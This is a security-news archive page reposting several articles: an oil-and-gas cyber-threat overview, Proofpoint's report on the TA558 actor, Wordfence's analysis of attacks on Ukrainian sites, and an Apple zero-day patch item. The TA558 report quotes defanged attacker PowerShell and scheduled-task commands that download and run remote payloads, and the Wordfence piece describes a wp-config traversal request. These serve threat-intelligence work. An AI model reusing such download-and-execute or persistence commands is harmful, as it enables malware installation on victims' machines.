Wifi Archives - Page 29 of 33 - Appunti dalla rete

Oil and Gas Cybersecurity: Industry Overview Part 1

The oil and gas industry is no stranger to major cybersecurity attacks, attempting to disrupt operations and services. Most of the best understood attacks against the oil industry are initial attempts to break into the corporate networks of oil companies.

Geopolitical tensions can cause major changes not only in physical space, but also in cyberspace. In March 2022, our researchers observed several alleged cyberattacks perpetrated by different groups. It has now become important more than ever to identify potential threats that may disrupt oil and gas companies, especially in these times when tensions are high.

Our survey also found that oil and gas companies have experienced disruptions with their supply due to cyberattacks. On average, the disruption lasted six days. The the financial damage amounts to approximately $3.3 million. Due to long disruption, the oil and gas industry has a much larger damage, too.

It is important to have an in-depth at cyberattacks than can disrupt oil and gas companies because they affect operations and profit in a major way. By looking closer at the infrastructure of an oil and gas company and identifying threats that can disrupt operation, a company can seal off loopholes and improve their cybersecurity framework.

The Infrastructure of a Typical Oil and Gas Company

An oil and gas company’s product chain usually has three parts—upstream, midstream, and downstream. Processes related to oil exploration and production is called an upstream, while the midstream refers to the transportation and storage of crude oil through pipelines, trains, ships, or trucks. Lastly, the downstream the production of end products. Cyber risks are present in all three categories, but for midstream and upstream, there are few publicly documented incidents.

Generally, an oil company has production sites where crude oil is extracted from wells, tank farms, where oil is stored temporarily, and a transportation system to bring the crude oil to a refinery. Transportation may include pipelines, trains, and ships. After processing in the refinery, different end products like diesel fuel, gasoline, and jet fuel are transported to tank farms and the products are later shipped to customers.

A gas company also typically has production sites and a transportation system such as railroads, ships, and pipelines. However, it needs compressor stations where the natural gas is compressed before transport. The natural gas is then transported to another plant that separates different hydrocarbon components, from natural gas, like LPG and cooking gas.

The intricate process of oil and gas companies mean they require constant monitoring to ensure the optimal performance measurement, performance improvement, quality control and safety.

Monitoring metrics include temperature, pressure, chemical composition, and detection of leaks. Some oil and gas production sites are in very remote locations where the weather can be extreme. For these sites, communication of the monitored metrics over the air, fixed (optic or copper) lines, or satellite is important. The systems of an oil and gas company is typically controlled by software and can be compromised by an attacker.

Threats

There are several threats that oil and gas companies should be aware of. The biggest threat to the industry is those that have a direct negative impact on the production of their end products. In addition, espionage is something that such companies need to defend themselves against, too.

In our in-depth research, the expert team at Trend Micro identified the following threats that can compromise oil and gas companies:

Sabotage
In the context of the oil and gas industry, sabotage can be done by changing the behavior of software, deleting or wiping specific content to disrupt company activity or deleting or wiping as much content as possible on every accessible machine.

Some examples of these kinds of sabotage operations have been reported broadly, the most famous being the Stuxnet case. Stuxnet was a piece of self-replicating malware that contained a very targeted and specific payload. Most infections of the worm were in Iran and analysis revealed that it was designed to exclusively target the centrifuge in the uranium enrichment facility of the Natanz Nuclear Plant in the country.
Insider threat
In most cases, an insider is a disgruntled employee seeking revenge or wanting to make easy money by selling valuable data to competitors. This person can sabotage operations. They can alter data to create problems, delete or destroy data from corporate servers or shared project folders, steal intellectual property, and leak sensitive documents to third parties.

Defense against insider threats is very complex since insiders generally have access to a lot of data. An insider also does not need months to know the internal network of the company — the insider probably already knows the inner workings of the organization.
Espionage and data theft
Data theft and espionage can be the starting point of a larger destructive attack. Attackers often need specific information before attempting further action. Obtaining sensitive data like well drilling techniques, data on suspected oil and gas reserves, and special recipes for premium products can also translate to monetary gain for attackers.
DNS hijacking
DNS hijacking is a form of data theft used by advanced attackers. The objective is to gain access to the corporate VPN network or corporate emails of governments and companies. We have seen several oil companies being targeted by advanced attackers who probably have certain geopolitical goals in mind.

In DNS hijacking, the DNS settings of a domain name are modified by an unauthorized third party. The third-party can, for instance, add an entry to the zone file of a domain or alter the resolution of one or more of the existing hostnames. The simplest things the attacker can do are committing vandalism(defacement), leaving a message on the hijacked website, and making the website unavailable. This will usually be noticed quickly and the result may just be reputational damage.
Attacks on Webmail and Corporate VPN Servers
While webmail and file-sharing services have become a vital tool for accessing emails and important documents on the go, these services can increase the possibility of a cyberattack on the surface.

For instance, a webmail hostname might get DNS-hijacked or hacked because of the vulnerability in the webmail software. Webmail and file-sharing and collaboration platforms can be compromised in credential-phishing attacks.

A well-prepared credential-phishing attack can be quite convincing, as when an actor registers a domain name can be quite convincing, as when an actor registers a domain name that resembles the legitimate webmail hostname, or when an actor creates a valid SSL certificate and chooses the targets within an organization carefully. The risk of webmail and third-party file-sharing services can be greatly reduced by requiring two factor authentication (preferably with a physical key) and corporate VPN access to these services.
Data leaks
Data leaks have always been problematic. But the oil and gas industry is more susceptible to these threats because leaked information can be quite beneficial to a competitor. Data leaks can also cause substantial damage to a company’s reputation.

During our research, we easily found dozens of sensitive documents related to the oil industry online. One way of finding these documents is by using specially crafted Google queries, called Google Dorks.

Another way to find such content is to hunt for data on public services like Pastebin, an online service that allows anyone to copy and paste any text-based content and store it there, privately, or publicly. Another source of data is public sandboxes meant for analysis of suspicious files. Users can mistakenly send legitimate documents to these sandboxes for analysis. Once uploaded, these documents can be parsed or downloaded by third parties.
External emails
In general, emails are well-protected inside companies. However, external emails cannot be controlled the same way. Employees regularly send emails to external addresses, hence some sensitive internal content ends up outside the company’s purview. Even worse, sensitive information can be copied to unsecured backup systems or stored locally on personal computers without standard corporate security protocols, which makes it easier for attackers to get hold of the information. Once a computer is compromised, an attacker can get the emails and use them in different ways to harm a company. For example, an actor could leak them on public servers or services like Pastebin.

In part two of our series, we look at additional threats that can compromise oil and gas companies, such as ransomware, malware, DNS tunneling, and zero-day exploits.

To learn more about digital threats that the oil and gas industry face, download our comprehend research here.

Source :
https://www.trendmicro.com/en_us/research/22/h/oil-gas-cybersecurity-part-1.html

Reservations Requested: TA558 Targets Hospitality and Travel

Key Findings:

TA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel organizations.
Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
TA558 increased operational tempo in 2022 to a higher average than previously observed.
Like other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns and adopted new tactics, techniques, and procedures.

Overview

Since 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.

Proofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command and control (C2) infrastructure, payload domains, and other infrastructure.

In 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted tactics and began using URLs and container files to distribute malware, likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the internet by default.

TA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in 2020 and 2021, Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558, detailing activity conducted over four years that is still ongoing. The information used in the creation of this report is based on email campaigns, which are manually contextualized, and analyst enriched descriptions of automatically condemned threats.

Campaign Details and Activity Timeline

2018

Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with “reserva” (Portuguese word for “reservation”) themes. Example campaign:

Subject: Corrigir data da reserva para o dia 03

Attachment: Booking – Dados da Reserva.docx

Attachment “Author”: C.D.T Original

SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910

Figure 1: Example TA558 email from 2018

The documents leveraged remote template URLs to download an additional RTF document, which then downloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the URL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to present.

RTF payload URL example:

hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc

2019

In 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden PowerPoint attachments and template injection with Office documents. This group expanded their malware arsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding targeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example campaign:

Subject: RESERVA

Attachment: RESERVA.docx

Attachment “Author”: msword

Attachment “Last Saved By”: Richard

SHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e

Figure 2: Example TA558 email from 2019

Figure 3: Example TA558 Microsoft Word attachment from 2019

The documents leveraged a remote template relationship URL to download an additional RTF document. The RTF document (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and execute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.

In December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room bookings in addition to Portuguese and Spanish.

2020

In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware. This group continued to use a variety of malware payloads including the addition of njRAT and Ozone RAT.

Hotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation requests. An example of a common attack chain in 2020:

From: Oab Brasil <fernando1540@bol[.]com[.]br>

Subject: Orçamento Conferencistas – 515449939

Attachment: reserva.ppa

SHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207

Figure 4: Example TA558 email from 2020

The message contained a PowerPoint attachment that used template injection techniques and VBA macros which, if enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS script in turn downloaded and executed Revenge RAT.

Figure 5: 2020 attack path example

TA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and 2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558 campaigns.

Figure 6: Total number of TA558 campaigns over time

2021

In 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g. CVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm, njRAT, Revenge RAT, Loda, and AsyncRAT.

Additionally, this group started to include more elaborate attack chains in 2021. For example, introducing more helper scripts and delivery mechanisms such as embedded Office documents within MSG files.

In this example 2021 campaign, emails purported to be, e.g.:

From: Financeiro UNIMED <financeiro@unimed-corporated[.]com>

Subject: Reserva

Replyto: cdt[name]cdt@gmail[.]com

Attachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx

SHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979

Emails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These messages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to ultimately download and execute AsyncRAT.

Figure 7: Example TA558 email from 2021

Of note is the repeat use of the string “CDT” contained the replyto email address and C2 domain names.

AsyncRAT C2 domains:

warzonecdt[.]duckdns[.]org

cdt2021.zapto[.]org

Example PowerShell execution to download and execute AsyncRAT:

$NOTHING = ‘(Ne<^^>t.We’.Replace(‘<^^>’,’w-Object

Ne’);$alosh=’bC||||||!@!@nlo’.Replace(‘||||||!@!@’,’lient).Dow’); $Dont=’adString(”hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt”)

‘;$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join ”)|IEX

Persistence was achieved through a scheduled task masquerading as a Spotify service.

schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr
 "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-
corporated[.]com/microsoft.txt" /F

This was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.

2022

In 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR attachments, ISO attachments, and Office documents.

TA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO attachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late 2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat landscape of actors adopting new filetypes to deliver payloads.

Additionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such as ISOs or zip files containing executables.

Figure 8: Campaigns using specific threat types over time

For example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported to be, e.g.:

From: Mauricio Fortunato <contato@155hotel[.]com[.]br>

Subject: Enc: Reserva Familiar

The URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT.

Similar to earlier campaigns, persistence was achieved via a scheduled task:

schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr
"powershell -w h -NoProfile -ExecutionPolicy Bypass -
Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-
corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"

Figure 9: 2022 campaign example chain.

In April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns included a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT which had not been observed in use by TA558 since December 2020. Messages purported to be:

From: Intuit QuickBooks Team <quickbooks@unimed-corporated.com>

Subject: QuickBooks Invoice 1000172347

Attachment: 1000172347.xlsm

SHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6

The emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA. The execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this theme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes.

Malware Use

Since 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and control (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge RAT.

Figure 10: Number of TA558 campaigns by malware type over time

Typically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.

Language Use

Since Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or Spanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.

Figure 11: Campaign totals by language since 2018

Interestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed this actor send, for example, a campaign in English and the following day another campaign in Portuguese. Individual targeting typically differs based on campaign language.

Notable Campaign Artifacts

In addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint researchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings, naming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email and malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes. Proofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains, replyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e., Author, Last Saved By), and Microsoft Office macro language.

Throughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain sslblindado[.]com to download either helper scripts or malware payloads. Some examples include:

microsofft[.]sslblindado[.]com
passagensv[.]sslblindado[.]com
system11[.]sslblindado[.]com

Like other threat actors, this group sometimes mimics technology service names to appear legitimate. For example, using terms in payload URLs or C2 domain names. Some examples include:

microsofft[.]sslblindado[.]com
firefoxsystem[.]sytes[.]net
googledrives[.]ddns[.]net

Another interesting pattern observed were common strings like “success” and “pitbull”. In several campaigns Proofpoint researchers spotted these strings in C2 domains. Some examples include:

successfully[.]hopto[.]org
success20[.]hopto[.]org
4success[.]zapto[.]org

From 2019 through 2020, TA558 conducted 10 campaigns used the keyword “Maringa” or “Maaringa” in payload URLs or email senders. Maringa is a city in Brazil. Examples include:

maringareservas[.]com[.]br/seila[.]rtf
maringa[.]turismo@system11[.]com[.]br

Possible Objectives

Proofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology, and campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially motivated cybercriminal actor.

The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads.

Open-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a Portuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers to a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel. Although Proofpoint does not associate the identified activity with TA558, it provides an example of possible follow-on activity and the impacts to both target organizations and their customers if an actor is able to compromise hotel or transportation entities.

Conclusion

TA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.

Organizations, especially those operating in targeted sectors in Latin America, North America, and Western Europe should be aware of this actor’s tactics, techniques, and procedures.

Indicators of Compromise (IOCs)

The following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.

C2 Domains

Indicator	Description	Date Observed
quedabesouro[.]ddns[.]net	RevengeRAT C2 Domain	2018
queda212[.]duckdns[.]org	njRAT/RevengeRAT C2 Domain	2018
3030pp[.]hopto[.]org	vjw0rm C2 Domain	2018 and 2019
vemvemserver[.]duckdns[.]org	Houdini/Loda C2 Domain	2019
4success[.]zapto[.]org	Loda C2 Domain	2019
success20[.]hopto[.]org	Loda C2 Domain	2020
msin[.]hopto[.]org	Loda C2 Domain	2021 and 2022
cdtpitbull[.]hopto[.]org	AsyncRAT C2 Domain	2021 and 2022
111234cdt[.]ddns[.]net	njRAT/AsyncRAT C2 Domain	2021 and 2022
cdt2021[.]zapto[.]org	AsyncRAT C2 Domain	2021 and 2022
38[.]132[.]101[.]45	RevengRAT C2 IP	2022

Payload URLs

Indicator	Description	Date Observed
hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc	RTF payload URL	2018
hxxp[://]hypemediardf[.]com[.]pl/css/css[.]doc	Loda Payload URL	2019
hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt	AsyncRAT Payload URL	2021
hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt	AsyncRAT Scheduled Task URL	2021
hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg	AsyncRAT Scheduled Task URL	2022

ET Signatures

ETPRO MALWARE Loda Logger CnC Activity

ETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4

ETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)

ET TROJAN Bladabindi/njRAT CnC Command (ll)

Source :
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

Analyzing Attack Data and Trends Targeting Ukrainian Domains

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued rising throughout the conflict in Ukraine, the types of attacks have been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many possible targets as they can to see what gets a result. The data we have analyzed shows that this tactic is being used against Ukrainian websites. This is in contrast to a targeted approach where threat actors go after specific individuals or organizations, using gathered intelligence to make at least an educated guess at the type of vulnerabilities that may be exploitable.

Data Shows a Variety of Attack Types

In the past 30 days, we have seen 16 attack types that triggered more than 85 different firewall rules across protected websites with .ua top-level domains. These rules blocked more than 9.8 million attack attempts on these websites, with the top five attack types accounting for more than 9.7 million of those attempts.

In order to demonstrate the top five attack types, we are going to follow a single threat actor who has been observed attempting each of these attack types throughout the last 30 days. Combining the originating IP addresses associated with the attack attempts with the user-agent that was used and other commonalities, we can say with a high degree of certainty that the demonstrated attack attempts were work of the same threat actor.

Known Malicious IP Addresses

The largest category of blocked attack attempts were due to use of a known malicious IP address. These IP addresses are maintained by the Wordfence blocklist, with new addresses added when they become maliciously engaged, and removed when they are no longer being used maliciously. When we see activity from an IP address on the blocklist, it is immediately blocked, however we do track the request that was received from the attacking server.

Top IPs blocked from attacking .ua domains

The top IP addresses we have blocked using known malicious IP addresses were often seen attempting to upload spam content to websites, however it was also common to see file upload and information disclosure attempts as well. Here we see a simple POST request that uses URL encoding along with base64 encoding to obfuscate a command to be run.

The decoded payload will simply display XO_Sp3ctra to alert the malicious actor that the affected system will allow commands to be run by them.

When we look at the top known malicious IP addresses blocked worldwide, the top 15 are IP addresses within Russia. This does not match what we are seeing in the Ukraine, where the top attacking IP addresses vary in location across North America, Europe, and Asia, with only three in Russia. However, there is a similarity. The IP address in 15th position worldwide for most initiated exploit attempts is in 4th position for blocked attacks against .ua domains. The IP address, 152.89.196.102, is part of an ASN belonging to Chang Way Technologies Co. Limited. The IP itself is located in Russia, but assigned to a company named Starcrecium Limited, which is based in Cyprus and has been used to conduct attacks of this type in the past. This IP has been blocked 78,438 times on .ua websites, with a total of 3,803,734 blocked attack attempts worldwide.

When you consider the fact that we logged malicious activity from almost 2.1 million individual IP addresses in this time, and the 15th worldwide ranked IP was ranked 4th against an area as small as Ukraine, the number of blocked attacks becomes very significant. Additionally, there were three IP addresses that ranked higher in Ukraine, but did not even make the top 20 worldwide, showing that while there are threat actors who are not focusing heavily on Ukraine, others are very focused on Ukrainian websites. What we are seeing from the IP addresses targeting Ukrainian websites more heavily is similar to what we see here, with information gathering and uploading spam content being the two main goals of the attack attempts.

One thing to keep in mind here is the fact that all .ua sites get our real-time threat intelligence, which is typically reserved for Wordfence Premium, Care, and Response customers, so it is not possible to get a true comparison between the websites in Ukraine and the rest of the world. IP addresses are added to the blocklist for many reasons, including the attack types we outlined above. Often these addresses are blocked for simple malicious behavior, such as searching for the existence of specific files on a website. More complex behavior like searching for the ability to run commands on the server will also lead to an IP being added to the blocklist.

Known Malicious User-Agents

One way that we block attacks is by tracking known malicious user-agents. This was the second-largest category our firewall blocked on .ua domains. When we see a user-agent string that is consistently being used in malicious events, like the user-agent below, we add it to a firewall rule.

User-agent strings can be set to an arbitrary value, so blocking user-agents is not sufficient to maintain security on its own. Nonetheless, tracking and blocking consistently malicious user-agents still allows us to block millions of additional attacks a day and provides us with a great degree of visibility into attacks that are less targeted at specific vulnerabilities. Many threat actors consistently use a given user-agent string, so this also allows us to block a large number of credential stuffing attacks on the first attempt, rather than after a certain threshold of failed logins.

There are many reasons a user-agent will be blocked by the Wordfence firewall, but always for consistent malicious activity. For instance, the user-agent here has been tracked in numerous types of attack attempts without consistent legitimate activity or false positives being detected. It is frequently found looking for configuration files, such as the aws.yml file in this example. Keep in mind that the fact that the actor is searching for this file does not automatically mean it exists on the server. However, if the file does exist and can be read by a would-be attacker, the data contained in the file would tell them a lot about the Amazon Web Services server configuration being used. This could lead to the discovery of vulnerabilities or other details that could help a malicious actor damage a website or server.

Similarly, information about the server could be discovered no matter who the server provider is if a file that returns configuration information, such as a info.php or server_info.php file can be discovered and accessed. Knowing the web server version, PHP version, and other critical details can add up to a vulnerability discovery that makes it easy for a malicious actor to access a website.

In addition to searching for configuration files, and other malicious activities, we also see an attacker using this specific user-agent attempting to upload malicious files to the servers they are trying to compromise. The following shows an attacker using the same known malicious user-agent attempting to upload a zip file, which, if successful, unzips to install a file named sp3ctra_XO.php on the server. When we said there were clues that these attack attempts were being perpetrated by the same threat actor, you can see here what one of those clues are with the sp3ctra_XO.php filename variation of the XO_Sp3ctra output seen earlier.

Over the past 30 days, we have observed this user-agent string used in more than 1.3 million attack attempts against Ukrainian websites. This makes it the largest attacking user-agent that is not immediately recognizable as an unusual user-agent. The only user-agent string that had more tracked attack attempts is wp_is_mobile. These user-agent strings are among the dozens that have been observed over time to be consistently associated only with malicious activity.

The user-agent we are following here was logged in 1,115,824,706 attack attempts worldwide in the same time frame, making this a very common malicious user-agent string. With this being a prolific user-agent in attacks around the world, it is no surprise that it is being seen in regular attack attempts on Ukrainian websites. Whether specifically targeted, or just a victim of circumstance, Ukrainian websites are seeing an increase in attacks. This is likely due to heightened activity from threat actors globally.

Directory Traversal

The next largest category of attack attempts we have been blocking targeting .ua domains was directory traversal. This relies on a malicious actor getting into the site files wherever they can, often through a plugin or theme vulnerability, and trying to access files outside of the original file’s directory structure. We are primarily seeing this used in much the same way as the information disclosure attacks, as a way to access the wp-config.php file that potentially provides database credentials. Other uses for this type of attack can also include the ability to get a list of system users, or access other sensitive data stored on the server.

In this example, the malicious actor attempted to download the site’s wp-config.php file by accessing the file structure through a download.php file in the twentyeleven theme folder, and moving up the directory structure to the WordPress root, where the wp-config.php file is located. This is seen in the request by adding ?file=..%2F..%2F..%2Fwp-config.php. This tells the server to look for a wp-config. php file that is three directories higher than the current directory.

This type of attack is often a guessing game for the malicious actor, as the path they are attempting to traverse may not even exist, but when it does, it can result in stolen data or damage to a website or system. The fact that the twentyeleven theme was used here does not necessarily indicate that the theme was vulnerable, or even installed on the site, only that the malicious actor was attempting to use it as a jumping off point while trying to find a vulnerable download.php file that could be used for directory traversal.

Information Disclosure

Information disclosure attacks are the fourth-largest attack type we blocked against .ua domains. The primary way we have observed threat actors attempting to exploit this type of vulnerability is through GET requests to a website, using common backup filenames, as seen in the example below. Unfortunately, due to the insecure practice of system administrators appending filenames with .bak as a method of making a backup of a file prior to modifying the contents, threat actors are likely to successfully access sensitive files by simply attempting to request critical files in known locations, with the .bak extension added. When successful, the contents of the file will be returned to the threat actor.

This is a fairly straightforward attack type, where the request simply returns the contents of the requested file. If a malicious actor can obtain the contents of a site’s wp-config.php file, even an outdated version of the file, they may be able to obtain the site’s database credentials. With access to a site’s database credentials, an attacker could gain full database access granted they have access to the database to log in with the stolen credentials. This would then give the attacker the ability to add malicious users, change a site’s content, and even collect useful information to be used in future attacks against the site or its users.

File Upload

File upload rounds out the top five categories of attack attempts we have been blocking targeting .ua domains. In these attempts, malicious actors try to get their own files uploaded to the server the website is hosted on. This serves a number of purposes, from defacing a website, to creating backdoors, and even distributing malware.

The example here is only one of the many types of upload attacks we have blocked. A malicious actor can use this POST request to upload a file to a vulnerable website that allows them to upload any file of their choosing. This can ultimately lead to remote code execution and full server compromise.

File upload request example with payload

The POST request in this case includes the contents of a common PHP file uploader named bala.php. This code provides a simple script to select and upload any file the malicious actor chooses. If the upload is successful they will see a message stating eXploiting Done but if it fails they message will read Failed to Upload. The script also returns some general information about the system that is being accessed, including the name of the system and the operating system being used.

Another important thing to note about this request is that it attempts to utilize the Ioptimization plugin as an entry point. Ioptimization is a known malicious plugin that offers backdoor functionality, but was not actually installed in the site in question. This indicates that the threat actor was trying to find and take over sites that had been previously compromised by a different attacker.

The fact that file uploads are the most common blocked attack type is not at all surprising. File uploads can be used to distribute malware payloads, store spam content to be displayed in other locations, and install shells on the infected system, among a number of other malicious activities. If a malicious actor can upload an executable file to a site, it generally gives them full control of the infected site and a foothold to taking over the server hosting that site. It can also help them remain anonymous by allowing them to send out further attacks from the newly infected site.

Conclusion

In this post, we continued our analysis of the cyber attacks targeting Ukrainian websites. While there has been an increase in the number of attacks being blocked since the start of Russia’s invasion of Ukraine, the attacks do not appear to be focused. Known malicious IP addresses were the most common reason we blocked attacks in the last 30 days, however, information stealing and spam were the most common end goals for the observed attack attempts.

If you believe your site has been compromised as a result of a vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below –

CVE-2022-32893 – An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
CVE-2022-32894 – An out-of-bounds issue in the operating system’s Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it’s aware the vulnerabilities “may have been actively exploited.”

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it’s likely that they were abused as part of highly-targeted intrusions.

The latest update brings the total number of zero-days patched by Apple to six since the start of the year –

CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Update: Apple on Thursday released a security update for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.

Source :
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

What are the Benefits of Adding an SSL Certificate to Your No-IP Free, Enhanced or Plus Hostname?

SSL Certificates are a great way to increase the security of your hostname because they add an extra layer of security for you and anyone that visits your hostname. Learn the benefits of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname.

What is an SSL Certificate?
SSL stands for Secure Socket Layer. This means that your hostname is given a secure connection between it, the Internet browser, and the webserver. This allows websites to transmit private data online, without the worry of it being stolen. You can tell when a website has an SSL certificate enabled, when the HTTP in the URL ends with an S, making it an HTTPS. Example: https://www.noip.com.

What are the advantages of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname?

Encryption and Verification

